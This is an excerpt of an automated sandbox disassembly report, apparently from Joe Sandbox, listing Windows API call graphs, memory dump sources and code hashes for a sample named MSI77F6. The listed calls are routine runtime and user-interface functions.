                                        • _free.LIBCMT ref: 007BCE3B
                                          • Part of subcall function 007928CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00798715,00000000,007988A3,00794673,?), ref: 007928DE
                                          • Part of subcall function 007928CA: GetLastError.KERNEL32(00000000,?,00798715,00000000,007988A3,00794673,?), ref: 007928F0
                                        • _free.LIBCMT ref: 007BCE43
                                        Similarity
                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                        • String ID:
                                        • API String ID: 1552873950-0
                                        • Opcode ID: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                                        • Instruction ID: e12fd589b6027dae2fdde28612596033006a291adbe7bdceb1b81f976f67ad5a
                                        • Opcode Fuzzy Hash: aae9b6d307097e5c95e800f3d48533f281671ab1ca06387605bf2f2c615f8bb0
                                        • Instruction Fuzzy Hash: F6514AB1A04218EFDF15AF64DC85BAEBBB9BF08340F1040AEB219A3251D7755A808F19
                                        APIs
                                        • _memset.LIBCMT ref: 00771E87
                                          • Part of subcall function 007738E4: _memset.LIBCMT ref: 00773965
                                          • Part of subcall function 007738E4: _wcscpy.LIBCMT ref: 007739B5
                                          • Part of subcall function 007738E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 007739C6
                                        • KillTimer.USER32(?,00000001), ref: 00771EDC
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00771EEB
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007E4526
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                        • String ID:
                                        • API String ID: 1378193009-0
                                        • Opcode ID: d5d78cc44f1c2e14f6187afae3ea1cacee20dec739aa6a2ae819fd036f6028ea
                                        • Instruction ID: fc6d97692ab8b11edd2f740b91871d9681211b305805390bee706221621d5ba5
                                        • Opcode Fuzzy Hash: d5d78cc44f1c2e14f6187afae3ea1cacee20dec739aa6a2ae819fd036f6028ea
                                        • Instruction Fuzzy Hash: 1E21F9719057C4AFEB3287298859FEBBBEC9B05348F44448DE69E56241C3B86A84CB51
                                        APIs
                                          • Part of subcall function 0078F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007BAEA5,?,?,00000000,00000008), ref: 0078F282
                                          • Part of subcall function 0078F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007BAEA5,?,?,00000000,00000008), ref: 0078F2A6
                                        • gethostbyname.WS2_32(?), ref: 007C92F0
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C92FB
                                        • _memmove.LIBCMT ref: 007C9328
                                        • inet_ntoa.WS2_32(?), ref: 007C9333
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                        • String ID:
                                        • API String ID: 1504782959-0
                                        • Opcode ID: ddd5ab69aa5983f305d4898c9d35eea005388ba5f96925a64073213c1825d398
                                        • Instruction ID: 63f66c4ef636524075d8998d2a1b8f94ab6782dc3e975c8e8486ab56a18910cf
                                        • Opcode Fuzzy Hash: ddd5ab69aa5983f305d4898c9d35eea005388ba5f96925a64073213c1825d398
                                        • Instruction Fuzzy Hash: 12116075500109EFCF15FBA0CD5ADEE77B9EF08355B108069F506A72A2DB38AE14CB61
                                        APIs
                                          • Part of subcall function 007945EC: __FF_MSGBANNER.LIBCMT ref: 00794603
                                          • Part of subcall function 007945EC: __NMSG_WRITE.LIBCMT ref: 0079460A
                                          • Part of subcall function 007945EC: RtlAllocateHeap.NTDLL(01750000,00000000,00000001), ref: 0079462F
                                        • std::exception::exception.LIBCMT ref: 0079013E
                                        • __CxxThrowException@8.LIBCMT ref: 00790153
                                          • Part of subcall function 00797495: RaiseException.KERNEL32(?,?,0077125D,00826598,?,?,?,00790158,0077125D,00826598,?,00000001), ref: 007974E6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                        • String ID: bad allocation
                                        • API String ID: 3902256705-2104205924
                                        • Opcode ID: 75e954204fc14346494f01ad7447d854c297c20fc17e613ac954fd0615eb6414
                                        • Instruction ID: 8e637f6f7999b32f10d2410e91bd2bbae00d9cd3e721399cf96c4911438d0e4d
                                        • Opcode Fuzzy Hash: 75e954204fc14346494f01ad7447d854c297c20fc17e613ac954fd0615eb6414
                                        • Instruction Fuzzy Hash: CBF0A43515421DEBCF15ABA8FC0A9EE77E9AF04350F104425F90492282DBB8DE91D6E5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75df7e54dac81bc37e5e3d42343bc2d11a52a49c0ca835784a3825cbcfe08c2f
                                        • Instruction ID: da5da4abc9d62d4b4295704c9523f3576bcd6d27fbe6ae14094f48db3678383f
                                        • Opcode Fuzzy Hash: 75df7e54dac81bc37e5e3d42343bc2d11a52a49c0ca835784a3825cbcfe08c2f
                                        • Instruction Fuzzy Hash: 09F17C71608701DFCB20DF24C884B5AB7E5FF88314F10892EF9999B292D779E905CB82
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClearVariant_memmove
                                        • String ID:
                                        • API String ID: 19560607-0
                                        • Opcode ID: cdc6312ea7aa740c11c5261ec8e0c05896aded99863048b04d170c513883cf61
                                        • Instruction ID: a256ef6b0ed8346088a7460bd4e6a91429e76183eb630910087ec45ab253e7b9
                                        • Opcode Fuzzy Hash: cdc6312ea7aa740c11c5261ec8e0c05896aded99863048b04d170c513883cf61
                                        • Instruction Fuzzy Hash: 6DA1AF74A4060ADFCB24EF58C884AADF7B1FF44710F548529E859AB351E739ED82CB90
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0077C00E,?,?,?,?,00000010), ref: 0077C627
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0077C65F
                                        • _memmove.LIBCMT ref: 0077C697
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_memmove
                                        • String ID:
                                        • API String ID: 3033907384-0
                                        • Opcode ID: 30270ef2d54cf756af3919b06ba24d2341b0a0b812a13adee07036c3b84bd360
                                        • Instruction ID: 75a245e78618b564ba148561247e63f7f3f350ce91bcc2931333e4ab9dd0de21
                                        • Opcode Fuzzy Hash: 30270ef2d54cf756af3919b06ba24d2341b0a0b812a13adee07036c3b84bd360
                                        • Instruction Fuzzy Hash: 7531E8B2201201AFDF249F24D84AA2BB7D9EF48350F10853DF95EC7290EA36E8108791
                                        APIs
                                        • __FF_MSGBANNER.LIBCMT ref: 00794603
                                          • Part of subcall function 00798E52: __NMSG_WRITE.LIBCMT ref: 00798E79
                                          • Part of subcall function 00798E52: __NMSG_WRITE.LIBCMT ref: 00798E83
                                        • __NMSG_WRITE.LIBCMT ref: 0079460A
                                          • Part of subcall function 00798EB2: GetModuleFileNameW.KERNEL32(00000000,00830312,00000104,?,00000001,00790127), ref: 00798F44
                                          • Part of subcall function 00798EB2: ___crtMessageBoxW.LIBCMT ref: 00798FF2
                                          • Part of subcall function 00791D65: ___crtCorExitProcess.LIBCMT ref: 00791D6B
                                          • Part of subcall function 00791D65: ExitProcess.KERNEL32 ref: 00791D74
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        • RtlAllocateHeap.NTDLL(01750000,00000000,00000001), ref: 0079462F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                        • String ID:
                                        • API String ID: 1372826849-0
                                        • Opcode ID: b7512655cebfcc8f291a5a20bd9e08eb7b361437510e7aad3de80a2e9dcb4bd2
                                        • Instruction ID: 475bb3be5f9dbf04d088e73909dc65f6dd176e7f5120ac569c088c3dc2514823
                                        • Opcode Fuzzy Hash: b7512655cebfcc8f291a5a20bd9e08eb7b361437510e7aad3de80a2e9dcb4bd2
                                        • Instruction Fuzzy Hash: F1019271601601EAEE203B75BC56F2A2758AB83761F110529F905DB582DFBCDC428A66
                                        APIs
                                        • TranslateMessage.USER32(?), ref: 0077E646
                                        • DispatchMessageW.USER32(?), ref: 0077E651
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0077E664
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 4217535847-0
                                        • Opcode ID: 99e63347bc25c1a5862429a43538ae9b411671b66314216d8c866e8d4d7dba34
                                        • Instruction ID: 2684066594c84dbb5a2e933e62ea693d9c42fde86d7031ccdef288233664afe7
                                        • Opcode Fuzzy Hash: 99e63347bc25c1a5862429a43538ae9b411671b66314216d8c866e8d4d7dba34
                                        • Instruction Fuzzy Hash: 33F01C726543459BDF20EBE18C49B6BB7DDBB98784F148C3DF645C2080EBB8D9048726
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CALL
                                        • API String ID: 0-4196123274
                                        • Opcode ID: 208e9d95ed6d7c1deb6c532b5851ee8f263944be09faa8b4e3b6363ead27db38
                                        • Instruction ID: ffe018677f4a2d155c470a2f6af0d779fba9199924bd7f66bf7b6f4c017e8219
                                        • Opcode Fuzzy Hash: 208e9d95ed6d7c1deb6c532b5851ee8f263944be09faa8b4e3b6363ead27db38
                                        • Instruction Fuzzy Hash: B1227170548341DFDB64EF24C494A2AB7E1FF84304F15896DE99A8B361D739EC89CB82
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: EA06
                                        • API String ID: 4104443479-3962188686
                                        • Opcode ID: 7b5e763d73d8777f16adec4d70d86168a3aee21245788aeeaa564e66402cec59
                                        • Instruction ID: b15db2d120f6616ababc60e784b12d4e24156f5a7862acdcf3b12fc005f0c2b7
                                        • Opcode Fuzzy Hash: 7b5e763d73d8777f16adec4d70d86168a3aee21245788aeeaa564e66402cec59
                                        • Instruction Fuzzy Hash: DA418061A0425CDBCF21AB648C557BE7FA19B55380F68C4B4EA8EDB183C72D8DD0C7A1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscmp
                                        • String ID: 0.0.0.0
                                        • API String ID: 856254489-3771769585
                                        • Opcode ID: ae670e142b481115414f6bff747627346f41b88ca4daf3aef28c7b7d8f8e24a9
                                        • Instruction ID: 60c50a6e2f0c9cb74e17dd76ce08c94cec91a1be8a908984e06a928b049701d6
                                        • Opcode Fuzzy Hash: ae670e142b481115414f6bff747627346f41b88ca4daf3aef28c7b7d8f8e24a9
                                        • Instruction Fuzzy Hash: 1B11C135600208EFCB04EF54D995E9DB3A9BF88710B14C05DE909AF391DA78ED818BE0
                                        APIs
                                        • _memset.LIBCMT ref: 007E3CF1
                                          • Part of subcall function 007731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007731DA
                                          • Part of subcall function 00773A67: SHGetMalloc.SHELL32(1<w), ref: 00773A7D
                                          • Part of subcall function 00773A67: SHGetDesktopFolder.SHELL32(?), ref: 00773A8F
                                          • Part of subcall function 00773A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00773AD2
                                          • Part of subcall function 00773B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,008322E8,?), ref: 00773B65
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                        • String ID: X
                                        • API String ID: 2727075218-3081909835
                                        • Opcode ID: b7a1bf869bcb65804ef7c6c145560c8799e629093561e4bb8713af396ee110b5
                                        • Instruction ID: aa63e723efc5075f573f01eb1e9a3d782f21f9db668f40f1b938aeee619422ba
                                        • Opcode Fuzzy Hash: b7a1bf869bcb65804ef7c6c145560c8799e629093561e4bb8713af396ee110b5
                                        • Instruction Fuzzy Hash: DE11A7B1A00298ABCF05DFD4D8096DE7BF9AF45704F008009E505BB281CBB95A499BA5
                                        Strings
                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007E34AA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                        • API String ID: 1029625771-2684727018
                                        • Opcode ID: 29e0d72e576262ca1bfc3edf82d2d3129c9d72e9d155357eac075b95c9252494
                                        • Instruction ID: 8d07bcc9107d78d2261819430c1b913358032834097dc380f7d7071f3544d12a
                                        • Opcode Fuzzy Hash: 29e0d72e576262ca1bfc3edf82d2d3129c9d72e9d155357eac075b95c9252494
                                        • Instruction Fuzzy Hash: B8F0687194124DFECF11EFB0D8559FFB778AA10340F10C526E82992182EB7C9B09DB20
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 502320c349101a5c964bf9173c6fe600716899bfe148e2c9b17abb7c73e2e068
                                        • Instruction ID: 57319c74fb2b24e5e533ee402177d1fd5b89310c7c550aafe5c324bee1779be5
                                        • Opcode Fuzzy Hash: 502320c349101a5c964bf9173c6fe600716899bfe148e2c9b17abb7c73e2e068
                                        • Instruction Fuzzy Hash: 5B817E74A4050ADFCB24EF48C884AADF7B1FF44710F648569D8459B315D739ED82CB90
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5b811b4d7ef1a9cea132f86f070e0ce3f10c5805f0dbcb3c2ce8a3c65bc42718
                                        • Instruction ID: 2055a468714e79ba95a85d601f53c0f00dab17c05ca975c704d196f8b147e997
                                        • Opcode Fuzzy Hash: 5b811b4d7ef1a9cea132f86f070e0ce3f10c5805f0dbcb3c2ce8a3c65bc42718
                                        • Instruction Fuzzy Hash: 1551A431604301DFCB14FF28D495BAA73E5AF48364F14856DF95A8B292DB38E905CB52
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 007C8074
                                        • GetForegroundWindow.USER32 ref: 007C807A
                                          • Part of subcall function 007C6B19: GetWindowRect.USER32(?,?), ref: 007C6B2C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$CursorForegroundRect
                                        • String ID:
                                        • API String ID: 1066937146-0
                                        • Opcode ID: 7ddd95a02ee5711c8b211d48d8b4e1a4107dcbcfd96694254b3c07b0a7b57cda
                                        • Instruction ID: 0773d4a57877410c3960bced8080cf4fa9192e1fc0faea8f9d0fc950b525f1b8
                                        • Opcode Fuzzy Hash: 7ddd95a02ee5711c8b211d48d8b4e1a4107dcbcfd96694254b3c07b0a7b57cda
                                        • Instruction Fuzzy Hash: EA311C75A00218EFDB11EFA4C885AAEB7F4FF08314F14446DE945A7251DB38AE45CB51
